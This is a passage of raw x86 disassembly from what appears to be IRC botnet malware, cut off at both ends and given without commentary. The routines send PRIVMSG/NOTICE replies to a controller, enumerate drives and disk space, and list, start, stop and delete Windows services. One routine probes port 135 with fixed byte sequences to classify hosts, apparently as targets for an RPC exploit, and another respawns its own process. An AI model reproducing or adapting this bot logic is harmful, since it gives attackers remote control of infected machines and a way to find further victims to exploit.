var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_40D682
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_40D7A2
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_40D7A2
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_40D7A2
push ebx
mov ebx, 400h
push 0
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_418E00
push edx
push eax
call sub_40D5BA
mov edi, offset aSkb ; "%sKB"
push eax
mov esi, 80h
push edi
lea eax, [ebp+var_198]
push esi
push eax
call sub_41792A
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_418E00
push edx
push eax
call sub_40D5BA
push eax
push edi
lea eax, [ebp+var_118]
push esi
push eax
call sub_41792A
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_418E00
push edx
push eax
call sub_40D5BA
push eax
push edi
lea eax, [ebp+var_98]
push esi
push eax
call sub_41792A
add esp, 18h
pop ebx
jmp short loc_40D7D1
; ---------------------------------------------------------------------------
loc_40D7A2: ; CODE XREF: sub_40D6CA+2C�j
; sub_40D6CA+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_198]
push esi
push eax
call sub_4173AC
lea eax, [ebp+var_118]
push esi
push eax
call sub_4173AC
lea eax, [ebp+var_98]
push esi
push eax
call sub_4173AC
add esp, 18h
loc_40D7D1: ; CODE XREF: sub_40D6CA+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_198]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40D6CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7E5 proc near ; CODE XREF: sub_40D8B7+17�p
; sub_40D8B7+60�p
var_500 = byte ptr -500h
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_300]
push ebx
push eax
call sub_40D6CA
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+var_80]
push offset aFailed ; "failed"
rep movsd
push eax
call sub_4177D0
add esp, 10h
test eax, eax
jnz short loc_40D858
push ebx
push ebx
call sub_40D639
pop ecx
push eax
push offset unk_42DDB4
lea eax, [ebp+var_500]
push 200h
push eax
call sub_41792A
add esp, 14h
jmp short loc_40D88C
; ---------------------------------------------------------------------------
loc_40D858: ; CODE XREF: sub_40D7E5+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_40D639
pop ecx
push eax
push offset unk_42DD68
lea eax, [ebp+var_500]
push 200h
push eax
call sub_41792A
add esp, 20h
loc_40D88C: ; CODE XREF: sub_40D7E5+71�j
push 1
lea eax, [ebp+var_500]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
lea eax, [ebp+var_500]
push eax
call sub_40C4F7
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_40D7E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D8B7 proc near ; CODE XREF: sub_40F6F1+591A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_40D8D8
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D7E5
add esp, 10h
jmp short loc_40D939
; ---------------------------------------------------------------------------
loc_40D8D8: ; CODE XREF: sub_40D8B7+9�j
push esi
push edi
push ebx
push ebx
call dword_441328 ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_417BEE
pop ecx
mov edi, eax
push edi
push esi
call dword_441328 ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_40D930
loc_40D8FC: ; CODE XREF: sub_40D8B7+77�j
push offset off_42DE00
push esi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_40D91F
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D7E5
add esp, 10h
loc_40D91F: ; CODE XREF: sub_40D8B7+54�j
push esi
call sub_417AF0
cmp [esi+eax+1], bl
lea esi, [esi+eax+1]
pop ecx
jnz short loc_40D8FC
loc_40D930: ; CODE XREF: sub_40D8B7+43�j
push edi
call sub_417C62
pop ecx
pop edi
pop esi
loc_40D939: ; CODE XREF: sub_40D8B7+1F�j
pop ebx
pop ebp
retn
sub_40D8B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D93C proc near ; DATA XREF: ___:0040EC3F�o
var_2B8 = dword ptr -2B8h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_446E1C
call dword_441450 ; closesocket
call sub_417021
call dword_441318 ; WSACleanup
call dword_441318 ; WSACleanup
mov ebx, dword_421070
push 64h
call ebx ; Sleep
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_417430
push 44h
lea eax, [ebp+var_54]
pop esi
push esi
push edi
push eax
call sub_417430
add esp, 18h
mov [ebp+var_54], esi
mov esi, 104h
lea eax, [ebp+var_25C]
push esi
push eax
mov [ebp+var_48], offset byte_43C63C
mov [ebp+var_28], 1
mov [ebp+var_24], di
nop
call near ptr 7C814EEAh
lea eax, [ebp+var_158]
push esi
push eax
push edi
nop
call near ptr 7C80B4CFh
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_25C]
push eax
push edi
push 28h
push 1
push edi
lea eax, [ebp+var_158]
push edi
push eax
push edi
nop
call near ptr 7C802367h
test eax, eax
jz short loc_40DA01
push 64h
call ebx ; Sleep
push [ebp+var_10]
mov esi, dword_42107C
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_40DA01: ; CODE XREF: sub_40D93C+AF�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_4457C4
mov eax, [esp+2B8h+var_2B8]
mov large fs:0, eax
add esp, 8
push edi
nop
call near ptr 7C81CDDAh
pop edi
pop esi
pop ebx
sub_40D93C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DA24 proc near ; CODE XREF: sub_40DA5C+125�p
; sub_40DA5C+14C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+arg_C]
test edi, edi
jle short loc_40DA52
loc_40DA35: ; CODE XREF: sub_40DA24+2C�j
push [ebp+arg_C]
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+arg_8]
push eax
call sub_418EB0
add esp, 0Ch
test eax, eax
jz short loc_40DA58
inc esi
cmp esi, edi
jl short loc_40DA35
loc_40DA52: ; CODE XREF: sub_40DA24+F�j
xor al, al
loc_40DA54: ; CODE XREF: sub_40DA24+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40DA58: ; CODE XREF: sub_40DA24+27�j
mov al, 1
jmp short loc_40DA54
sub_40DA24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DA5C proc near ; CODE XREF: sub_403E35+8B�p
; sub_403E35+174�p ...
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_417B70
mov eax, [ebp+arg_4]
push esi
dec eax
push edi
jz short loc_40DA9D
dec eax
jz short loc_40DA7B
dec eax
loc_40DA75: ; CODE XREF: sub_40DA5C+57�j
xor eax, eax
loc_40DA77: ; CODE XREF: sub_40DA5C+3F�j
; sub_40DA5C+169�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_40DA7B: ; CODE XREF: sub_40DA5C+16�j
push 3
push 1388h
push [ebp+arg_0]
call dword_4413F8 ; inet_addr
push eax
call sub_407635
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
jmp short loc_40DA77
; ---------------------------------------------------------------------------
loc_40DA9D: ; CODE XREF: sub_40DA5C+13�j
push 6
push 1
push 2
call dword_441438 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz short loc_40DA75
push ebx
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_417430
add esp, 0Ch
mov [ebp+var_10], 2
push 87h
call dword_4413B8 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_40AE95
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_441360 ; connect
cmp eax, edi
jz loc_40DBB9
push ebx
push 48h
push offset dword_42DE04
push esi
call dword_441408 ; send
cmp eax, edi
jz loc_40DBB9
mov esi, 2000h
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call dword_4413D0 ; recv
cmp eax, edi
jz loc_40DBB9
cmp [ebp+var_200E], 0Ch
jnz short loc_40DBB9
push ebx
push 18h
push offset dword_42DE50
push [ebp+arg_4]
call dword_441408 ; send
cmp eax, edi
jz short loc_40DBB9
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call dword_4413D0 ; recv
mov esi, eax
cmp esi, edi
jz short loc_40DBB9
cmp [ebp+var_200E], 2
jnz short loc_40DBB9
push 10h
push offset loc_42DE6C
lea eax, [ebp+var_2010]
push esi
push eax
call sub_40DA24
add esp, 10h
test al, al
jz short loc_40DB99
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_40DBB9
; ---------------------------------------------------------------------------
loc_40DB99: ; CODE XREF: sub_40DA5C+12F�j
push 10h
push offset dword_42DE80
lea eax, [ebp+var_2010]
push esi
push eax
call sub_40DA24
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_40DBB9: ; CODE XREF: sub_40DA5C+9B�j
; sub_40DA5C+B2�j ...
push [ebp+arg_4]
call dword_441450 ; closesocket
mov eax, ebx
pop ebx
jmp loc_40DA77
sub_40DA5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DBCA proc near ; CODE XREF: sub_40F576+3D�p
; sub_40F6F1+1CB�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push 200h
push eax
call sub_418BEF
add esp, 10h
lea eax, [ebp+var_200]
push 0
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_441408 ; send
leave
retn
sub_40DBCA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DC10 proc near ; CODE XREF: sub_401000+88�p
; sub_401447+76�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_40DC2B
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_40DC2B: ; CODE XREF: sub_40DC10+14�j
push edi
call sub_417AF0
push [ebp+arg_4]
mov esi, 1FAh
sub esi, eax
call sub_417AF0
push [ebp+arg_8]
sub esi, eax
lea eax, [ebp+var_400]
push offset dword_42433C
push esi
push eax
call sub_41792A
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push edi
push offset dword_42DE94
push eax
call sub_4173AC
add esp, 2Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_441408 ; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_40DCA9
push 7D0h
nop
call near ptr 7C802442h
locret_40DCA9: ; CODE XREF: sub_40DC10+8C�j
leave
retn
sub_40DC10 endp
; =============== S U B R O U T I N E =======================================
sub_40DCAB proc near ; CODE XREF: sub_40F6F1:loc_41180E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_40DD10
lea esi, [eax+eax*2]
push 0
shl esi, 2
push 0
push dword_42DEB8[esi]
push edi
push eax
call sub_40DD32
add esp, 14h
test eax, eax
jnz short loc_40DCF3
push edi
push off_42DEB4[esi]
mov esi, offset dword_445E8C
push offset unk_42DFEC
push esi
call sub_4173AC
add esp, 10h
jmp short loc_40DD2D
; ---------------------------------------------------------------------------
loc_40DCF3: ; CODE XREF: sub_40DCAB+2A�j
push eax
call sub_40DDD4
push eax
push edi
mov esi, offset dword_445E8C
push offset unk_42DFB0
push esi
call sub_4173AC
add esp, 14h
jmp short loc_40DD2D
; ---------------------------------------------------------------------------
loc_40DD10: ; CODE XREF: sub_40DCAB+C�j
lea eax, [eax+eax*2]
mov esi, offset dword_445E8C
push off_42DEB0[eax*4]
push offset unk_42DF78
push esi
call sub_4173AC
add esp, 0Ch
loc_40DD2D: ; CODE XREF: sub_40DCAB+46�j
; sub_40DCAB+63�j
mov eax, esi
pop edi
pop esi
retn
sub_40DCAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DD32 proc near ; CODE XREF: sub_40DCAB+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call dword_4413AC ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_40DD59
nop
call near ptr 7C910331h
mov ebx, eax
jmp short loc_40DDCE
; ---------------------------------------------------------------------------
loc_40DD59: ; CODE XREF: sub_40DD32+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_4412A0 ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_40DD79
nop
call near ptr 7C910331h
mov ebx, eax
jmp short loc_40DDC6
; ---------------------------------------------------------------------------
loc_40DD79: ; CODE XREF: sub_40DD32+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_40DDAC
cmp eax, 3
jz short loc_40DD9D
jle short loc_40DDBF
cmp eax, 6
jg short loc_40DDBF
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_441308 ; ControlService
jmp short loc_40DDB3
; ---------------------------------------------------------------------------
loc_40DD9D: ; CODE XREF: sub_40DD32+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_4412A8 ; StartServiceA
jmp short loc_40DDB3
; ---------------------------------------------------------------------------
loc_40DDAC: ; CODE XREF: sub_40DD32+4D�j
push esi
call dword_44130C ; DeleteService
loc_40DDB3: ; CODE XREF: sub_40DD32+69�j
; sub_40DD32+78�j
test eax, eax
jnz short loc_40DDBF
nop
call near ptr 7C910331h
mov ebx, eax
loc_40DDBF: ; CODE XREF: sub_40DD32+54�j
; sub_40DD32+59�j ...
push esi
call dword_4412BC ; CloseServiceHandle
loc_40DDC6: ; CODE XREF: sub_40DD32+45�j
push edi
call dword_4412BC ; CloseServiceHandle
pop esi
loc_40DDCE: ; CODE XREF: sub_40DD32+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_40DD32 endp
; =============== S U B R O U T I N E =======================================
sub_40DDD4 proc near ; CODE XREF: sub_40DCAB+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_40DE89
jz loc_40DE82
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_40DE4C
jz short loc_40DE42
mov ecx, eax
sub ecx, 3
jz short loc_40DE38
dec ecx
dec ecx
jz short loc_40DE2E
dec ecx
jz short loc_40DE24
sub ecx, 51h
jz short loc_40DE1A
sub ecx, 24h
jnz loc_40DEFF ; default
; jumptable 0040DEA6 cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DE1A: ; CODE XREF: sub_40DDD4+31�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DE24: ; CODE XREF: sub_40DDD4+2C�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DE2E: ; CODE XREF: sub_40DDD4+29�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DE38: ; CODE XREF: sub_40DDD4+25�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DE42: ; CODE XREF: sub_40DDD4+1E�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DE4C: ; CODE XREF: sub_40DDD4+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_40DE7B
dec ecx
jz short loc_40DE74
dec ecx
jz short loc_40DE6D
dec ecx
jnz loc_40DEFF ; default
; jumptable 0040DEA6 cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DE6D: ; CODE XREF: sub_40DDD4+86�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DE74: ; CODE XREF: sub_40DDD4+83�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DE7B: ; CODE XREF: sub_40DDD4+80�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DE82: ; CODE XREF: sub_40DDD4+11�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DE89: ; CODE XREF: sub_40DDD4+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_40DEFF ; default
; jumptable 0040DEA6 cases 1,5,6,8,9,12,13,15,16
jz short loc_40DEEC
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_40DEFF ; default
; jumptable 0040DEA6 cases 1,5,6,8,9,12,13,15,16
movzx ecx, byte_40DF40[ecx]
jmp off_40DF18[ecx*4] ; switch jump
loc_40DEAD: ; DATA XREF: ___:off_40DF18�o
push offset aTheSpecifiedDa ; jumptable 0040DEA6 case 7
jmp short loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DEB4: ; CODE XREF: sub_40DDD4+D2�j
; DATA XREF: ___:off_40DF18�o
push offset aTheServiceDepe ; jumptable 0040DEA6 case 17
jmp short loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DEBB: ; CODE XREF: sub_40DDD4+D2�j
; DATA XREF: ___:off_40DF18�o
push offset aTheServiceDe_0 ; jumptable 0040DEA6 case 10
jmp short loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DEC2: ; CODE XREF: sub_40DDD4+D2�j
; DATA XREF: ___:off_40DF18�o
push offset aTheServiceHasB ; jumptable 0040DEA6 case 0
jmp short loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DEC9: ; CODE XREF: sub_40DDD4+D2�j
; DATA XREF: ___:off_40DF18�o
push offset aTheSpecified_0 ; jumptable 0040DEA6 case 2
jmp short loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DED0: ; CODE XREF: sub_40DDD4+D2�j
; DATA XREF: ___:off_40DF18�o
push offset aTheServiceCoul ; jumptable 0040DEA6 case 11
jmp short loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DED7: ; CODE XREF: sub_40DDD4+D2�j
; DATA XREF: ___:off_40DF18�o
push offset aTheServiceHa_0 ; jumptable 0040DEA6 case 14
jmp short loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DEDE: ; CODE XREF: sub_40DDD4+D2�j
; DATA XREF: ___:off_40DF18�o
push offset aTheRequested_1 ; jumptable 0040DEA6 case 3
jmp short loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DEE5: ; CODE XREF: sub_40DDD4+D2�j
; DATA XREF: ___:off_40DF18�o
push offset aTheServiceHasN ; jumptable 0040DEA6 case 4
jmp short loc_40DEF1
; ---------------------------------------------------------------------------
loc_40DEEC: ; CODE XREF: sub_40DDD4+BE�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_40DEF1: ; CODE XREF: sub_40DDD4+41�j
; sub_40DDD4+4B�j ...
push offset dword_4457CC
call sub_4173AC
pop ecx
pop ecx
jmp short loc_40DF12
; ---------------------------------------------------------------------------
loc_40DEFF: ; CODE XREF: sub_40DDD4+36�j
; sub_40DDD4+89�j ...
push eax ; default
; jumptable 0040DEA6 cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownErr_0 ; "An unknown error occurred: <%ld>"
push offset dword_4457CC
call sub_4173AC
add esp, 0Ch
loc_40DF12: ; CODE XREF: sub_40DDD4+129�j
mov eax, offset dword_4457CC
retn
sub_40DDD4 endp
; ---------------------------------------------------------------------------
off_40DF18 dd offset loc_40DEC2 ; DATA XREF: sub_40DDD4+D2�r
dd offset loc_40DEC9 ; jump table for switch statement
dd offset loc_40DEDE
dd offset loc_40DEE5
dd offset loc_40DEAD
dd offset loc_40DEBB
dd offset loc_40DED0
dd offset loc_40DED7
dd offset loc_40DEB4
dd offset loc_40DEFF
byte_40DF40 db 0, 9, 1, 2 ; DATA XREF: sub_40DDD4+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DF52 proc near ; CODE XREF: sub_40F6F1+2148�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_4413AC ; OpenSCManagerA
push ebx
mov [ebp+var_C], eax
push [ebp+arg_8]
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_40DF8A: ; CODE XREF: sub_40DF52+120�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push 168h
push eax
push 3
push 30h
push [ebp+var_C]
call dword_441378 ; EnumServicesStatusA
test eax, eax
jnz short loc_40DFC4
nop
call near ptr 7C910331h
cmp eax, 0EAh
jnz loc_40E078
loc_40DFC4: ; CODE XREF: sub_40DF52+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_40E06F
lea esi, [ebp+var_188]
loc_40DFD5: ; CODE XREF: sub_40DF52+117�j
mov eax, [esi+8]
dec eax
jz short loc_40E01E
dec eax
jz short loc_40E017
dec eax
jz short loc_40E010
dec eax
jz short loc_40E009
dec eax
jz short loc_40E002
dec eax
jz short loc_40DFFB
dec eax
jz short loc_40DFF4
push offset aUnknown_0 ; " Unknown"
jmp short loc_40E023
; ---------------------------------------------------------------------------
loc_40DFF4: ; CODE XREF: sub_40DF52+99�j
push offset aPaused_0 ; " Paused"
jmp short loc_40E023
; ---------------------------------------------------------------------------
loc_40DFFB: ; CODE XREF: sub_40DF52+96�j
push offset aPausing ; " Pausing"
jmp short loc_40E023
; ---------------------------------------------------------------------------
loc_40E002: ; CODE XREF: sub_40DF52+93�j
push offset aContinuing ; " Continuing"
jmp short loc_40E023
; ---------------------------------------------------------------------------
loc_40E009: ; CODE XREF: sub_40DF52+90�j
push offset aRunning ; " Running"
jmp short loc_40E023
; ---------------------------------------------------------------------------
loc_40E010: ; CODE XREF: sub_40DF52+8D�j
push offset aStoping ; " Stoping"
jmp short loc_40E023
; ---------------------------------------------------------------------------
loc_40E017: ; CODE XREF: sub_40DF52+8A�j
push offset aStarting ; " Starting"
jmp short loc_40E023
; ---------------------------------------------------------------------------
loc_40E01E: ; CODE XREF: sub_40DF52+87�j
push offset aStopped ; " Stopped"
loc_40E023: ; CODE XREF: sub_40DF52+A0�j
; sub_40DF52+A7�j ...
lea eax, [ebp+var_20]
push eax
call sub_4173AC
pop ecx
lea eax, [ebp+var_20]
pop ecx
push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS ; "%s: %s (%s)"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_38C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_40DFD5
loc_40E06F: ; CODE XREF: sub_40DF52+77�j
cmp [ebp+var_8], ebx
jnz loc_40DF8A
loc_40E078: ; CODE XREF: sub_40DF52+6C�j
push [ebp+var_C]
call dword_4412BC ; CloseServiceHandle
xor eax, eax
pop edi
cmp eax, [ebp+var_4]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_40DF52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E08F proc near ; CODE XREF: sub_40F6F1:loc_4118F0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_40E128
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_40E0B8
dec eax
jnz short loc_40E108
push edi
push 0
call sub_40E261
pop ecx
pop ecx
jmp short loc_40E104
; ---------------------------------------------------------------------------
loc_40E0B8: ; CODE XREF: sub_40E08F+18�j
cmp [ebp+arg_8], 0
jnz short loc_40E0F6
push 24h
push edi
call sub_418630
pop ecx
test eax, eax
pop ecx
jnz short loc_40E0F6
push 57h
pop eax
loc_40E0CF: ; CODE XREF: sub_40E08F+77�j
push eax
call sub_40EA39
push eax
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_445A88
push off_42DEB0[eax*4]
push offset unk_42E5BC
push esi
call sub_4173AC
add esp, 18h
jmp short loc_40E148
; ---------------------------------------------------------------------------
loc_40E0F6: ; CODE XREF: sub_40E08F+2D�j
; sub_40E08F+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_40E1B5
add esp, 0Ch
loc_40E104: ; CODE XREF: sub_40E08F+27�j
test eax, eax
jnz short loc_40E0CF
loc_40E108: ; CODE XREF: sub_40E08F+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_445A88
push off_42DEB4[eax*4]
push offset unk_42E58C
push esi
call sub_4173AC
add esp, 10h
jmp short loc_40E148
; ---------------------------------------------------------------------------
loc_40E128: ; CODE XREF: sub_40E08F+A�j
mov eax, [ebp+arg_0]
mov esi, offset dword_445A88
lea eax, [eax+eax*2]
push off_42DEB0[eax*4]
push offset unk_42E554
push esi
call sub_4173AC
add esp, 0Ch
loc_40E148: ; CODE XREF: sub_40E08F+65�j
; sub_40E08F+97�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_40E08F endp
; =============== S U B R O U T I N E =======================================
sub_40E14E proc near ; CODE XREF: sub_416561+245�p
arg_0 = dword ptr 4
arg_C = dword ptr 10h
push esi
xor esi, esi
cmp [esp+4+arg_0], esi
jnz short loc_40E15B
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40E15B: ; CODE XREF: sub_40E14E+7�j
push ebx
push ebp
push edi
push esi
